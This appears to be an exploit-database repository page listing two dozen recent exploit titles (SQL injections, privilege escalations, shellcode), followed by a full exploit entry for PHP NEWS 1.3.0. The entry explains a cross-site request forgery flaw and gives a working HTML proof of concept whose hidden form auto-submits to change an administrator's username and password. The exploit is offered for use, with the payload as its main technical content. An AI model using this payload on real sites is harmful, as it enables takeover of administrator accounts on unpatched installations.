558ab1fc67
24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)
58 lines
1.9 KiB
HTML
Executable file
58 lines
1.9 KiB
HTML
Executable file
*=========================================================================================================
|
|
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
|
|
# Author: Meryem AKDOĞAN
|
|
# Google Dork: -
|
|
# Date: 16/10/2016
|
|
# Type: webapps
|
|
# Platform : PHP
|
|
# Vendor Homepage: http://newsphp.sourceforge.net
|
|
# Software Link: https://sourceforge.net/projects/newsphp/
|
|
# Version: 1.3.0
|
|
*=========================================================================================================
|
|
|
|
|
|
DETAILS
|
|
========================================
|
|
|
|
PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in
|
|
place) meaning that if an admin user can be tricked to visit a crafted URL
|
|
created
|
|
by attacker (via spear phishing/social engineering), a form will be
|
|
submitted to (http://sitename/path/index.php) that will change admin
|
|
password.
|
|
|
|
Once exploited, the attacker can login to the admin panel using the
|
|
username and the password he posted in the form.
|
|
|
|
|
|
RISK
|
|
========================================
|
|
|
|
Attacker can change admin password with this vulnerablity
|
|
|
|
|
|
|
|
TECHNICAL DETAILS & POC
|
|
========================================
|
|
|
|
<html>
|
|
<!— CSRF PoC —>
|
|
<body>
|
|
<form action="
|
|
http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
|
|
<input type="hidden" name="id" value="7" />
|
|
<input type="hidden" name="newusername" value="meryem akdogan" />
|
|
<input type="hidden" name="username" value="meryem" />
|
|
<input type="hidden" name="password" value="meryem123." />
|
|
<input type="hidden" name="password2" value="meryem123." />
|
|
<input type="hidden" name="email" value="b@gmail.com" />
|
|
<input type="hidden" name="language" value="en_GB" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
========================================
|